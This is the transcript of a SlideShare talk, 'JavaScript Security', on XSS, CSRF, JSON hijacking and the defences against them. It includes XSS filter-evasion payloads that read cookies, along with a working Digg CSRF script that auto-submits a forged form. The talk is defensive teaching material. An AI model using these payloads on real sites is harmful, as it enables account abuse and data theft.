0
JavaScript Security
             jason harwig
quot;How dangerous could this silly little toy
scripting language running inside a browser be?quot;


                    ...
“JavaScript's biggest weakness is that it is
                               not secure.”


                              d...
quot;.. nine out of 10 websites still have serious
            vulnerabilities. . (XSS) as the top
                       ...
OWASP Top 10 2007
1. XSS               6. Information Leakage

2. Injection Flaws   7. Broken Auth

3. File Exec         8...
browser limitations
javascript IO
• Ajax
• Image
• iFrame
• Source script
• Bridge to flash, Java applets
var xhr = new XmlHttpRequest();

xhr.open(...)
NIC Server   Google




                * get or post
var image = new Image();

image.src = url;




        * can detect connection success failure
NIC Server                     Google




             * get requests only | onload | onerror
f = document.createElement('iframe');

f.src = url;

document.body.appendChild(f);




               * only if same domain
NIC Server   Google




             * get requests only
s = document.createElement('script');

s.type = 'text/javascript';

s.src= url;

document.body.appendChild(s);




       ...
NIC Server   Google




             * get requests only
f = document.createElement('form');

f.method = 'post';

...

f.submit();
NIC Server   Google




                * get or post
white hat

• Mashup / Aggregate content
• SSO Solutions
• Protect users / application integrity
black hat
• XSS
• CSRF
• JSON hi-jacking
• Cookie session hijacking
• Internal network scanning
• History checking
cross-site scripting
Browser IFrame




same origin policy
user input
escape it!
XSS Flavors

• Type 0 - DOM
• Type 1 - Non-Persistant
• Type 2 - Persistant
type 0

var p = location.href.params;
document.body.innerHTML = p
Type 1

Search:     <script>alert('xss');</script>
Type 2

Please enter username:   <script>alert('xss');</script>
<c:out value=quot;${var}quot;
Your Username: <script>alert('xss');</script>
       escapeXml=quot;truequot;/>
html filtering
samy is my hero

                  from http://fast.info/myspace/
Friend Requests



7,000




5,250




3,500




1,750




   0
  12:34pm   1:30am   8:35am       9:30am   10:30am   1:30pm
tag/attribute whitelist

<div style=quot;background:url(
    'javascript:alert('xss')'
)quot;>
'javascript' stripped

<div style=quot;background:url(
    'javanscript:alert('xss')'
)quot;>
quot; stripped


String.fromCharCode(34);
innerHTML stripped


eval('document.body.inne' + 'rHTML');
onreadystatechange stripped


eval('xmlhttp.onread'
   + 'ystatechange = callback');
to be continued..
alternatives to escaping?
google caja / ADsafe
attack vectors to prevent?
code evaluation


eval('alert(document.cookie)');
(new Function('alert(document.cookie)'))();
code eval continued


<iframe src=quot;java�script:alert('xss')quot;>
</iframe>
poluting global objects

try {
  throw EvilArrayFunction;
} catch (Array) { }
xss lessons


• Escape XML
cross site request forgery
          the new kid
NIC Server   Google
Digg.com

• “digg” a story while logged in
• Cookie authentication
• known url, parameters
digg exploit code
mf = window.frames[quot;myframequot;];
html = '<form name=quot;diggformquot; 
             action=quot;h...
Fixes?

• Referral checking?
• quick cookie expiration?
• post?
solved

session.setAttribute(quot;tokenquot;, token);

<input type=quot;hiddenquot; value=quot;${token}quot;/>
double submit cookie
digg link


<a href=quot;javascript:dig([num],[id],[digCheck])quot;>digg it</a>
digg submit js
new Ajax.Request(quot;/diginfullquot;,
{ quot;methodquot;: quot;postquot;,
  quot;parametersquot;:
    quot...
no diggcheck, no digg
digg.com


• Added random hash as post parameter
• server verifies request
myspace


• used hash in post to add friends
• XSS vulnerable so the hash could be retrieved
HDIV


• HTTP Data Integrity Validator
rsnake joins twitter
crossdomain.xml

<?xml version=quot;1.0quot; encoding=quot;UTF-8quot;?>
<cross-domain-policy xmlns:xsi=quot;http://www.w3....
http://www.yourminis.com/search_minis.aspx?q=XSS
stealing your gmail contacts
google contacts url


contacts?out=js&callback=google
responseText
google ({
  Success: true,
  Errors: [],
  Body: {
    Contacts: [
      { id, email, etc. }
    ]
  }
});
google’s solution?


• responseXml
lessons

• Protect high value forms
• CANNOT be stopped if site is vulnerable to
  XSS
json hijacking
new Ajax.Request('secretStuff', {
 onSuccess: doWork
});

// server responds with
[
  { sensitive_info: '...' },
  { sensi...
So how do I do it?


• Override Array
• Source script
demo
solved

/*-secure-
[
    { sensitive_info: '...' },
    { sensitive_info: '...' }
]
*/
“solved” continued


• protect JSON services behind post
lessons

• Many experts recommend JSON services
  shouldn’t serve sensitive data
 • use secure comment
• responseXml as al...
Session hijacking
demo
internal network penetration
history hijack
demo
resources
quot;Security Now! Podcastquot;         quot;Fortifyquot;
twit.tv/sn                      fortifysoftware.com/se...
twitter: jharwig
jason.harwig@nearinfinity.com
    nearinfinity.com/blogs


  careers@nearinfinity.com


                    ...
JavaScript Security
JavaScript Security
JavaScript Security
Upcoming SlideShare
Loading in...5
×

JavaScript Security

14,674

Published on

JavaScript, as it is today, is an insecure language. We need to understand it's shortcomings to improve the security of our applications to protect our users.

Published in: Technology
0 Comments
15 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
14,674
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
466
Comments
0
Likes
15
Embeds 0
No embeds

No notes for slide

Transcript of "JavaScript Security"

  1. 1. JavaScript Security jason harwig
  2. 2. quot;How dangerous could this silly little toy scripting language running inside a browser be?quot; Jeff Atwood codinghorror.com stackoverflow.com
  3. 3. “JavaScript's biggest weakness is that it is not secure.” douglas crockford
  4. 4. quot;.. nine out of 10 websites still have serious vulnerabilities. . (XSS) as the top vulnerability classquot; WhiteHat Security Website Security Statistic Report
  5. 5. OWASP Top 10 2007 1. XSS 6. Information Leakage 2. Injection Flaws 7. Broken Auth 3. File Exec 8. Insecure Crypto 4. Direct Object 9. Insecure Reference Communications 5. CSRF 10.Failure to restrict URL access
  6. 6. browser limitations
  7. 7. javascript IO • Ajax • Image • iFrame • Source script • Bridge to flash, Java applets
  8. 8. var xhr = new XmlHttpRequest(); xhr.open(...)
  9. 9. NIC Server Google * get or post
  10. 10. var image = new Image(); image.src = url; * can detect connection success failure
  11. 11. NIC Server Google * get requests only | onload | onerror
  12. 12. f = document.createElement('iframe'); f.src = url; document.body.appendChild(f); * only if same domain
  13. 13. NIC Server Google * get requests only
  14. 14. s = document.createElement('script'); s.type = 'text/javascript'; s.src= url; document.body.appendChild(s); * if JSON returned
  15. 15. NIC Server Google * get requests only
  16. 16. f = document.createElement('form'); f.method = 'post'; ... f.submit();
  17. 17. NIC Server Google * get or post
  18. 18. white hat • Mashup / Aggregate content • SSO Solutions • Protect users / application integrity
  19. 19. black hat • XSS • CSRF • JSON hi-jacking • Cookie session hijacking • Internal network scanning • History checking
  20. 20. cross-site scripting
  21. 21. Browser IFrame same origin policy
  22. 22. user input escape it!
  23. 23. XSS Flavors • Type 0 - DOM • Type 1 - Non-Persistant • Type 2 - Persistant
  24. 24. type 0 var p = location.href.params; document.body.innerHTML = p
  25. 25. Type 1 Search: <script>alert('xss');</script>
  26. 26. Type 2 Please enter username: <script>alert('xss');</script>
  27. 27. <c:out value=quot;${var}quot; Your Username: <script>alert('xss');</script> escapeXml=quot;truequot;/>
  28. 28. html filtering
  29. 29. samy is my hero from http://fast.info/myspace/
  30. 30. Friend Requests 7,000 5,250 3,500 1,750 0 12:34pm 1:30am 8:35am 9:30am 10:30am 1:30pm
  31. 31. tag/attribute whitelist <div style=quot;background:url( 'javascript:alert('xss')' )quot;>
  32. 32. 'javascript' stripped <div style=quot;background:url( 'javanscript:alert('xss')' )quot;>
  33. 33. quot; stripped String.fromCharCode(34);
  34. 34. innerHTML stripped eval('document.body.inne' + 'rHTML');
  35. 35. onreadystatechange stripped eval('xmlhttp.onread' + 'ystatechange = callback');
  36. 36. to be continued..
  37. 37. alternatives to escaping?
  38. 38. google caja / ADsafe
  39. 39. attack vectors to prevent?
  40. 40. code evaluation eval('alert(document.cookie)'); (new Function('alert(document.cookie)'))();
  41. 41. code eval continued <iframe src=quot;java�script:alert('xss')quot;> </iframe>
  42. 42. poluting global objects try { throw EvilArrayFunction; } catch (Array) { }
  43. 43. xss lessons • Escape XML
  44. 44. cross site request forgery the new kid
  45. 45. NIC Server Google
  46. 46. Digg.com • “digg” a story while logged in • Cookie authentication • known url, parameters
  47. 47. digg exploit code mf = window.frames[quot;myframequot;]; html = '<form name=quot;diggformquot; action=quot;http://digg.com/diginfullquot; method=quot;postquot;>'; html = html+'<input type=quot;textquot; name=quot;idquot; value=quot;367034quot;/>'; html = html+'<input type=quot;textquot; name=quot;orderchangequot; value=quot;2quot;/>'; html = html+'<input type=quot;textquot; name=quot;categoryquot; value=quot;0quot;/>'; html = html+'<input type=quot;textquot; name=quot;pagequot; value=quot;0quot;/>'; html = html+'<input type=quot;textquot; name=quot;tquot; value=quot;undefinedquot;/>'; html = html+'<input type=quot;textquot; name=quot;rowquot; value=quot;1quot;/>'; html = html+'</form>'; mf.document.body.innerHTML = html; mf.document.diggform.submit(); from http://4diggers.blogspot.com/
  48. 48. Fixes? • Referral checking? • quick cookie expiration? • post?
  49. 49. solved session.setAttribute(quot;tokenquot;, token); <input type=quot;hiddenquot; value=quot;${token}quot;/>
  50. 50. double submit cookie
  51. 51. digg link <a href=quot;javascript:dig([num],[id],[digCheck])quot;>digg it</a>
  52. 52. digg submit js new Ajax.Request(quot;/diginfullquot;, { quot;methodquot;: quot;postquot;, quot;parametersquot;: quot;id=quot; + itemd + quot;&row=quot; + row + quot;&digcheck=quot; + digcheck + quot;&type=quot; + type + quot;&loc=quot; + pagetype });
  53. 53. no diggcheck, no digg
  54. 54. digg.com • Added random hash as post parameter • server verifies request
  55. 55. myspace • used hash in post to add friends • XSS vulnerable so the hash could be retrieved
  56. 56. HDIV • HTTP Data Integrity Validator
  57. 57. rsnake joins twitter
  58. 58. crossdomain.xml <?xml version=quot;1.0quot; encoding=quot;UTF-8quot;?> <cross-domain-policy xmlns:xsi=quot;http://www.w3.org/2001/ XMLSchema-instancequot; xsi:noNamespaceSchemaLocation=quot;http:// www.adobe.com/xml/schemas/PolicyFile.xsdquot;> <allow-access-from domain=quot;*.twitter.comquot; /> <site-control permitted-cross-domain-policies=quot;master-onlyquot;/> <allow-http-request-headers-from domain=quot;*.twitter.comquot; headers=quot;*quot; secure=quot;truequot;/> </cross-domain-policy>
  59. 59. http://www.yourminis.com/search_minis.aspx?q=XSS
  60. 60. stealing your gmail contacts
  61. 61. google contacts url contacts?out=js&callback=google
  62. 62. responseText google ({ Success: true, Errors: [], Body: { Contacts: [ { id, email, etc. } ] } });
  63. 63. google’s solution? • responseXml
  64. 64. lessons • Protect high value forms • CANNOT be stopped if site is vulnerable to XSS
  65. 65. json hijacking
  66. 66. new Ajax.Request('secretStuff', { onSuccess: doWork }); // server responds with [ { sensitive_info: '...' }, { sensitive_info: '...' } ]
  67. 67. So how do I do it? • Override Array • Source script
  68. 68. demo
  69. 69. solved /*-secure- [ { sensitive_info: '...' }, { sensitive_info: '...' } ] */
  70. 70. “solved” continued • protect JSON services behind post
  71. 71. lessons • Many experts recommend JSON services shouldn’t serve sensitive data • use secure comment • responseXml as alternative
  72. 72. Session hijacking
  73. 73. demo
  74. 74. internal network penetration
  75. 75. history hijack
  76. 76. demo
  77. 77. resources quot;Security Now! Podcastquot; quot;Fortifyquot; twit.tv/sn fortifysoftware.com/security- resources/ quot;WhiteHat Securityquot; whitehatsec.com quot;XSS Generatorquot; ha.ckers.org/xss.html quot;Jeremiah Grossman Blogquot; jeremiahgrossman.blogspot.com quot;Samy is my Heroquot; fast.info/myspace quot;Digg Hackquot; 4diggers.blogspot.com quot;HDIVquot; hdiv.org
  78. 78. twitter: jharwig jason.harwig@nearinfinity.com nearinfinity.com/blogs careers@nearinfinity.com 81
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×